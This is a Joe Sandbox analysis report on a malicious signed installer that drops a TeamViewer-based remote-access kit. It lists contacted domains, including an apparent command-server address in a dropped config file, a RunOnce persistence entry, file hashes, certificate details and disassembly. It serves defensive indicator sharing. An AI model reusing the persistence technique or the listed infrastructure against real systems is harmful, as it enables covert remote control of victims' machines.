                                                                                                                      		master1.teamviewer.comGermany
                                                                                                                      		43304TEAMVIEWER-ASDEfalse
                                                                                                                      172.67.205.33
                                                                                                                      		outnegorave.infoUnited States
                                                                                                                      		13335CLOUDFLARENETUSfalse
                                                                                                                      37.252.232.109
                                                                                                                      		unknownAustria
                                                                                                                      		42473AS-ANEXIAANEXIAInternetdienstleistungsGmbHATfalse

                                                                                                                      Private

                                                                                                                      IP
                                                                                                                      127.0.0.1

                                                                                                                      General Information

                                                                                                                      Joe Sandbox Version:33.0.0 White Diamond
                                                                                                                      Analysis ID:483795
                                                                                                                      Start date:15.09.2021
                                                                                                                      Start time:14:06:31
                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                      Overall analysis duration:0h 14m 57s
                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                      Report type:light
                                                                                                                      Sample file name:77Etc0bR2v.exe
                                                                                                                      Cookbook file name:default.jbs
                                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                      Run name:Run with higher sleep bypass
                                                                                                                      Number of analysed new started processes analysed:25
                                                                                                                      Number of new started drivers analysed:0
                                                                                                                      Number of existing processes analysed:0
                                                                                                                      Number of existing drivers analysed:0
                                                                                                                      Number of injected processes analysed:0
                                                                                                                      Technologies:
                                                                                                                      • HCA enabled
                                                                                                                      • EGA enabled
                                                                                                                      • HDC enabled
                                                                                                                      • AMSI enabled
                                                                                                                      Analysis Mode:default
                                                                                                                      Analysis stop reason:Timeout
                                                                                                                      Detection:MAL
                                                                                                                      Classification:mal76.evad.winEXE@14/11@4/4
                                                                                                                      EGA Information:Failed
                                                                                                                      HDC Information:
                                                                                                                      • Successful, ratio: 36.4% (good quality ratio 35.4%)
                                                                                                                      • Quality average: 85.3%
                                                                                                                      • Quality standard deviation: 22.8%
                                                                                                                      HCA Information:Failed
                                                                                                                      Cookbook Comments:
                                                                                                                      • Adjust boot time
                                                                                                                      • Enable AMSI
                                                                                                                      • Sleeps bigger than 120000ms are automatically reduced to 1000ms
                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                      Warnings:
                                                                                                                      Show All
                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, wuapihost.exe
                                                                                                                      • TCP Packets have been reduced to 100
                                                                                                                      • Excluded IPs from analysis (whitelisted): 20.82.209.183, 8.238.85.254, 8.248.147.254, 8.248.137.254, 8.248.113.254, 8.248.139.254, 209.197.3.8, 20.54.110.249, 40.112.88.60, 23.216.77.209, 23.216.77.208, 23.35.236.56, 20.82.210.154
                                                                                                                      • Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fg.download.windowsupdate.com.c.footprint.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, cds.d2s7q6s2.hwcdn.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                      Simulations

                                                                                                                      Behavior and APIs

                                                                                                                      TimeTypeDescription
                                                                                                                      14:08:02AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce TeamViewer.exe "C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe" f
                                                                                                                      14:08:10AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce TeamViewer.exe "C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe" f
                                                                                                                      14:08:49API Interceptor1x Sleep call for process: svchost.exe modified

                                                                                                                      Joe Sandbox View / Context

                                                                                                                      IPs

                                                                                                                      No context

                                                                                                                      Domains

                                                                                                                      No context

                                                                                                                      ASN

                                                                                                                      No context

                                                                                                                      JA3 Fingerprints

                                                                                                                      No context

                                                                                                                      Dropped Files

                                                                                                                      No context

                                                                                                                      Created / dropped Files

                                                                                                                      C:\ProgramData\Microsoft\Network\Downloader\edb.log
                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):4096
                                                                                                                      Entropy (8bit):0.5972165353381301
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6:0FE0k1GaD0JOCEfMuaaD0JOCEfMKQmDtS/tAl/gz2cE0fMbhEZolrRSQ2hyYIIT:0EGaD0JcaaD0JwQQ0tAg/0bjSQJ
                                                                                                                      MD5:D8D0D663F77B6A59418CC83E759489A3
                                                                                                                      SHA1:E184E188992F47890C2131012D10A617326571C6
                                                                                                                      SHA-256:EC7D75FCEB2CE0CE633F11864BE12F44AEF5FF24A105F6E20391247E1F683D2A
                                                                                                                      SHA-512:77C91200DF1C5F1B8EACBDFDFEA5FA14274194CDDFC71C4ED88B4A5E1779E9857D61A65EC783179F5D3C66F37568CF3A16E8DA4BBD7FCEDF79ECA1B9597441AA
                                                                                                                      Malicious:false
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: ......:{..(.....1....y;.............. ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................1....y;...........&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................
                                                                                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                      File Type:Extensible storage user DataBase, version 0x620, checksum 0x3816929a, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):32768
                                                                                                                      Entropy (8bit):0.0970600410052794
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6:6zwl/+aeXRIE11Y8TRXaNUgQKEzwl/+aeXRIE11Y8TRXaNUgQK:60+aeXO4blaegQKE0+aeXO4blaegQK
                                                                                                                      MD5:7891AF17428A431A98339B1F99EACACA
                                                                                                                      SHA1:F7CD13538D809FCBF1C53EE9DD7328229DE4CC1F
                                                                                                                      SHA-256:3D3634BEBE4D54F66B45287CF4B2AF761E3D3A4322217FB79DB7324BA4336776
                                                                                                                      SHA-512:7C465D3AF93572748353A64A5A10DE8D81A477F2BC81A3B4CF5E36327B913D76DA649304D4260948553DAF01E9C952938815BB2E67A5DDCF68E02D548BE3740C
                                                                                                                      Malicious:false
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: 8...... ................e.f.3...w........................&..........w..1....y..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w......................................................................................................................................................................................................................................G..|1....y..................\..C1....y..........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):8192
                                                                                                                      Entropy (8bit):0.11169102851775213
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:y9EvUCNXAl/bJdAtiif98Ball:yYUUXAt4i0
                                                                                                                      MD5:C6E7F438F2544EE49F946C530D05A73A
                                                                                                                      SHA1:138A4F1DDB20ACD9C683F96E1DE5632ECEE87400
                                                                                                                      SHA-256:6C4844ACB817093DA3055F0924DADF4BCC069E3EA8E45B69D9130F3480C62DB3
                                                                                                                      SHA-512:05F321F15CE0A76F389D0317C25597BEE96962E1445208C54766BCAB3D609C8AAEB965173CF7F228DA3A67894049C67FE0015E46B7E4B13D0BA3505FBDF8C1D4
                                                                                                                      Malicious:false
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: zF......................................3...w..1....y.......w...............w.......w....:O.....w..................\..C1....y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      C:\Users\user\AppData\Local\Temp\nso5B2F.tmp
                                                                                                                      Process:C:\Users\user\Desktop\77Etc0bR2v.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):5132919
                                                                                                                      Entropy (8bit):6.737705896318464
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:98304:FjdgHPmMogx1WZRkPapqj+ZG/D+AKbS5ZmfzCAW6LcTjH:tqHuMogsRkyq0umfzCgi
                                                                                                                      MD5:E29F152B606F9669680D7CB24308991A
                                                                                                                      SHA1:680CC154C050B90FEA35AD0FDB97E387D62B7740
                                                                                                                      SHA-256:FF1A9205BD8076DE3811E5417AC2AEAC44D940F392B19C9D8A2833493CC8034F
                                                                                                                      SHA-512:C33DB997837A716A0F09E0E40C61D92BADFAF2A440C8EBB5BAB9F156A2CC61E91DBF7CC748D074F7743E336F93080D4BDABBC14483A23036EC68C9DDEDC40DF5
                                                                                                                      Malicious:false
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: ........,.......,.......D.......$.......w...................................................................................................................................................................................................................................................................C...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      C:\Users\user\AppData\Roaming\TeamViewer\TV.dll
                                                                                                                      Process:C:\Users\user\Desktop\77Etc0bR2v.exe
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):75256
                                                                                                                      Entropy (8bit):6.743019659267088
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:coaayOa9Z58qTGIT0XhZKfl2MjEzHPggfLD//qQmoz:p1uZ58qTGITey4zJfLD3qQmC
                                                                                                                      MD5:A44F2649C82B35D42E6036D1C75E48C4
                                                                                                                      SHA1:EE3B00701C97ED107B78ECBDF9D962F1508EDC8E
                                                                                                                      SHA-256:760945429F7EA52C40C75A0FA0424D943E317EC48575C812545CC2C4BE5B0510
                                                                                                                      SHA-512:B8340F06E3446AA91F435F4009557830BBC8E8279321F41198C076E8202869B98C156809CF3FAD8F900B569ACA2AB6B6A7725A1532E2846B31EDEC513E84734D
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 27%
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W.l5...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...fRich...f................PE..L.....;a...........!.........H...............................................@......v.....@......................... ...V.......@.......L................%... ..$.......................................................t............................text............................... ..`.rdata..v+.......,..................@..@.data...x...........................@....rsrc...L...........................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                      C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                      Process:C:\Users\user\Desktop\77Etc0bR2v.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):4375848
                                                                                                                      Entropy (8bit):6.621789733656387
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:98304:6jdgHPmMogx1WZRkPapqj+ZG/D+AKbS5m:4qHuMogsRkyq0N
                                                                                                                      MD5:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                                      SHA1:A3A7498F02BAB188B3944382BBA4D016D63607D1
                                                                                                                      SHA-256:D2CDCA8EFA27089D3DEAD0CCEAFBE470B3815C9C2A362C007D1F516E5379AC92
                                                                                                                      SHA-512:412B42C540A9FE41709453D725B7A1E888849326A70A411E645F29240D730D69EBCF4B26E6870D33E0A395C612470BD00064025D22B0C6BCD211242E8EF6CEA6
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............o...o...o.......o.......o.....2.o.....q.o.F.2...o...n...o.......o.F.0...o.......o.......o.......o.Rich..o.................PE..L.....LK..................3.........F........03...@...........................K......ZC.......................................@...... K.8`............B.(...........pe4......................x:.....`x:.@............03. ............................text.....3.......3................. ..`.rdata..&....03.......3.............@..@.data...h....P@.."...*@.............@....tls..........K......LB.............@....rsrc...8`... K..b...NB.............@..@........................................................................................................................................................................................................................................................................................................
                                                                                                                      C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.ini
                                                                                                                      Process:C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                      File Type:data
                                                                                                                      Category:modified
                                                                                                                      Size (bytes):272
                                                                                                                      Entropy (8bit):3.256847641939824
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6:cAeYlA3m7D5KTsYKdyp3cQYKDClRAeYlA3m7D5KLp3gk+AeYlA3m7D5KLp3gkp:z7NzdyTmlM7NM397NM3p
                                                                                                                      MD5:64D2D142BE53943D72355DE71619BB22
                                                                                                                      SHA1:D48EC103950F4A66E7774915D6FC36CCA5240D18
                                                                                                                      SHA-256:09F60A98FEC98F6D8E7CC9421FDE08B7B34E6385FA7EC871D19BD640EE7FC881
                                                                                                                      SHA-512:26F508C945EB69D41494A5B53B16BDFCE738606A49F7D2738839FA83ED59700149739EE089F3EEB74C2F4832414B4BBFB0D46F6321EB27BAAD27E8D226B80090
                                                                                                                      Malicious:false
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o.....h.p.n.=./.u.p.d.a.t.e./.....h.s.n.=.1.....h.t.=.6...../.B.8.C.6.3.1.A.8./.....h.s.n.=.1.....h.t.=.6.....1.3.6.....r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.
                                                                                                                      C:\Users\user\AppData\Roaming\TeamViewer\Teamviewer_Resource_ja.dll
                                                                                                                      Process:C:\Users\user\Desktop\77Etc0bR2v.exe
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):607528
                                                                                                                      Entropy (8bit):6.564133582926054
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:r5hmfFy7ZJ0uUCAD06v7JlHZctms+2lifZ0iMe8d6YySkYQKMDqtAu3NhgGy6wSP:Vhmf4ACAzneosEi6YhvAuUGyUrNJbL
                                                                                                                      MD5:554EE592B125CFDF81B376B5C24AA61C
                                                                                                                      SHA1:666D2C04171246734575D4453289AA2D9AF93B97
                                                                                                                      SHA-256:B296EF421D5B7F569E623D41A42D87A064C4358CFA89A192988F854929E3ABD1
                                                                                                                      SHA-512:6C3111BF9D26929D426797EBDD8D804B34E2E8F593BF488298E70964538F2DA3D971C4ED3C3237C829AE7DE4FDB8D4316D84F153E93E3788808547A8538B73F5
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........-T.L:..L:..L:...F..L:...B..L:.Rich.L:.........PE..L.....LK...........!.........................................................0.......................................................................0..(.... .......................................................................................rsrc...............................@..@.reloc....... ....... ..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      C:\Users\user\AppData\Roaming\TeamViewer\vpn.cab
                                                                                                                      Process:C:\Users\user\Desktop\77Etc0bR2v.exe
                                                                                                                      File Type:Microsoft Cabinet archive data, 71196 bytes, 8 files
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):71196
                                                                                                                      Entropy (8bit):7.996182851828797
                                                                                                                      Encrypted:true
                                                                                                                      SSDEEP:1536:qUTRtkxXFuG1DKNYCqRBiFxMZPQCJh/njgG5+jC5hA101pNO0:qUNtax12mCqRBiyQG/jgG5+j2NO0
                                                                                                                      MD5:8A84AA1B9F20DC194947D7AC592D818E
                                                                                                                      SHA1:4A77AB0D59F39BF600BB89D9121446F6AA2D139B
                                                                                                                      SHA-256:8A740BE5D92B734E77B210354988DFD49F31C49814240513CF4B0353A8CE6DFB
                                                                                                                      SHA-512:B3F90ADB48861CD775F15E75885C81A130D62DFE429A5833FA1CE0BC203EEA15BD8A7306618B1F4D27810493300400C8B149D58032F90F0E9D93B04F9B8F1050
                                                                                                                      Malicious:false
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: MSCF............,...............JA..H........)........k<'b..64\teamviewervpn.cat......)....k<'b..64\TeamViewerVPN.inf.(....>....k<'b..64\teamviewervpn.sys..<........k<&b..64\install.exe..)........k<'b..86\teamviewervpn.cat......-....k<'b..86\TeamViewerVPN.inf..b...B....k<'b..86\teamviewervpn.sys...........k<&b..86\install.exe.h.t"X<..[.....`.....@...N.f.|..U.......$."..L.F..4....|....U$Q/...%.J).D...@F.......f...9..../@.x;.N..w..2...i1P.....O.....T...T.y...``...;.$.&....@........@..~..\...J.44...:.@....M.....x\.0c|..W...,.|.x..+.P..N.. ..S0@B.;?.(..B..,.%.{.. ....(T.....U.5..=.3'rxci.;....P$..H)...1...h._e..{....Q._..}...K......U.s...._..WRWlS.8.._...D.NI..>.|O<..q...$0.EA*8d...../..=@2q...g_.Hs|`+...`.>U..)X.G*.8.....>..!4 ....}..Ps.a.8.......4.0`._t%...P.qgr..'..~.d..r.....o...w..q........,O.K..Y.8..M.D...p........~.....O?......}@.....>....O..N...c../p..[....._=.~.S....Q..p.O...@.WL....*..}..%1...3a.....u...)..K.Y...s..E;...".e.....X0(IR..'..1...\..6...(i
                                                                                                                      C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):55
                                                                                                                      Entropy (8bit):4.306461250274409
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                      MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                      SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                      SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                      SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                      Malicious:false
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                      Static File Info

                                                                                                                      General

                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Entropy (8bit):7.973639636653341
                                                                                                                      TrID:
                                                                                                                      • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                                                                      • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                      File name:77Etc0bR2v.exe
                                                                                                                      File size:1828192
                                                                                                                      MD5:e71e3b995477081569ed357e4d403666
                                                                                                                      SHA1:809c4cc4ae51fcf3eca24e7d7fa5c1b6b5db52ce
                                                                                                                      SHA256:94b9abbe10bd9d6abcb8dce27814992bf7a09ed416c66998bd3496bda1490713
                                                                                                                      SHA512:2dca79011e40164672f7d81ed42fa9f080bca7148e451a0bf94c6bf0f6381e6eb8ee1bc3bac14e690304410a43f46994bfae76ee7d8ee2785ffaecb02f9ebd3b
                                                                                                                      SSDEEP:49152:OBGHLrZP7auvm8sJEkbxH0ulBuw8ZtTUZEoH+hE:vrdTauvkERulBaUZEoH+h
                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L.....*J.................\.........

                                                                                                                      File Icon

                                                                                                                      Icon Hash:c403939c989380c8

                                                                                                                      Static PE Info

                                                                                                                      General

                                                                                                                      Entrypoint:0x40323c
                                                                                                                      Entrypoint Section:.text
                                                                                                                      Digitally signed:true
                                                                                                                      Imagebase:0x400000
                                                                                                                      Subsystem:windows gui
                                                                                                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                      Time Stamp:0x4A2AE2A2 [Sat Jun 6 21:41:54 2009 UTC]
                                                                                                                      TLS Callbacks:
                                                                                                                      CLR (.Net) Version:
                                                                                                                      OS Version Major:4
                                                                                                                      OS Version Minor:0
                                                                                                                      File Version Major:4
                                                                                                                      File Version Minor:0
                                                                                                                      Subsystem Version Major:4
                                                                                                                      Subsystem Version Minor:0
                                                                                                                      Import Hash:5bd07784f328e868356a895d4ab1a505

                                                                                                                      Authenticode Signature

                                                                                                                      Signature Valid:true
                                                                                                                      Signature Issuer:CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
                                                                                                                      Signature Validation Error:The operation completed successfully
                                                                                                                      Error Number:0
                                                                                                                      Not Before, Not After
                                                                                                                      • 6/3/2021 5:00:00 PM 6/4/2022 4:59:59 PM
                                                                                                                      Subject Chain
                                                                                                                      • CN=Hartex LLC, O=Hartex LLC, L=Moscow, C=RU
                                                                                                                      Version:3
                                                                                                                      Thumbprint MD5:5D5CA7E8D78224799E8AA101FF486137
                                                                                                                      Thumbprint SHA-1:319517761E92EC6EEF1966A5994570D46A498093
                                                                                                                      Thumbprint SHA-256:AC50A5D91A71BA8447EE795FF966E625AEC004E49EB24ADAA366B988686B65A5
                                                                                                                      Serial:009B576882CCDB891FD6E4A66671F3AC71

                                                                                                                      Entrypoint Preview

                                                                                                                      Instruction
                                                                                                                      sub esp, 00000180h
                                                                                                                      push ebx
                                                                                                                      push ebp
                                                                                                                      push esi
                                                                                                                      xor ebx, ebx
                                                                                                                      push edi
                                                                                                                      mov dword ptr [esp+18h], ebx
                                                                                                                      mov dword ptr [esp+10h], 00409130h
                                                                                                                      xor esi, esi
                                                                                                                      mov byte ptr [esp+14h], 00000020h
                                                                                                                      call dword ptr [00407030h]
                                                                                                                      push 00008001h
                                                                                                                      call dword ptr [004070B4h]
                                                                                                                      push ebx
                                                                                                                      call dword ptr [0040727Ch]
                                                                                                                      push 00000008h
                                                                                                                      mov dword ptr [00423F58h], eax
                                                                                                                      call 00007F58B4E4EF2Eh
                                                                                                                      mov dword ptr [00423EA4h], eax
                                                                                                                      push ebx
                                                                                                                      lea eax, dword ptr [esp+34h]
                                                                                                                      push 00000160h
                                                                                                                      push eax
                                                                                                                      push ebx
                                                                                                                      push 0041F458h
                                                                                                                      call dword ptr [00407158h]
                                                                                                                      push 004091B8h
                                                                                                                      push 004236A0h
                                                                                                                      call 00007F58B4E4EBE1h
                                                                                                                      call dword ptr [004070B0h]
                                                                                                                      mov edi, 00429000h
                                                                                                                      push eax
                                                                                                                      push edi
                                                                                                                      call 00007F58B4E4EBCFh
                                                                                                                      push ebx
                                                                                                                      call dword ptr [0040710Ch]
                                                                                                                      cmp byte ptr [00429000h], 00000022h
                                                                                                                      mov dword ptr [00423EA0h], eax
                                                                                                                      mov eax, edi
                                                                                                                      jne 00007F58B4E4C32Ch
                                                                                                                      mov byte ptr [esp+14h], 00000022h
                                                                                                                      mov eax, 00429001h
                                                                                                                      push dword ptr [esp+14h]
                                                                                                                      push eax
                                                                                                                      call 00007F58B4E4E6C2h
                                                                                                                      push eax
                                                                                                                      call dword ptr [0040721Ch]
                                                                                                                      mov dword ptr [esp+1Ch], eax
                                                                                                                      jmp 00007F58B4E4C385h
                                                                                                                      cmp cl, 00000020h
                                                                                                                      jne 00007F58B4E4C328h
                                                                                                                      inc eax
                                                                                                                      cmp byte ptr [eax], 00000020h
                                                                                                                      je 00007F58B4E4C31Ch
                                                                                                                      cmp byte ptr [eax], 00000022h
                                                                                                                      mov byte ptr [eax+eax+00h], 00000000h

                                                                                                                      Rich Headers

                                                                                                                      Programming Language:
                                                                                                                      • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                      Data Directories

                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x440000xd628.rsrc
                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x1bbf680x25f8
                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                      Sections

                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                      .text0x10000x5a5a0x5c00False0.660453464674data6.41769823686IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                      .rdata0x70000x11900x1200False0.375217013889SysEx File -4.24219639454IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                      .data0x90000x1af980x400False0.55859375data4.70902740305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                      .ndata0x240000x200000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                      .rsrc0x440000xd6280xd800False0.300600405093data5.06095919413IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                      Resources

                                                                                                                      NameRVASizeTypeLanguageCountry
                                                                                                                      RT_ICON0x442e00x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 1056964862EnglishUnited States
                                                                                                                      RT_ICON0x485080x25a8dataEnglishUnited States
                                                                                                                      RT_ICON0x4aab00x2488PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                                                                                                      RT_ICON0x4cf380x1a68dataEnglishUnited States
                                                                                                                      RT_ICON0x4e9a00x10a8dataEnglishUnited States
                                                                                                                      RT_ICON0x4fa480x988dataEnglishUnited States
                                                                                                                      RT_ICON0x503d00x6b8dataEnglishUnited States
                                                                                                                      RT_ICON0x50a880x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                      RT_DIALOG0x50ef00x202dataEnglishUnited States
                                                                                                                      RT_DIALOG0x510f80xf8dataEnglishUnited States
                                                                                                                      RT_DIALOG0x511f00xeedataEnglishUnited States
                                                                                                                      RT_GROUP_ICON0x512e00x76dataEnglishUnited States
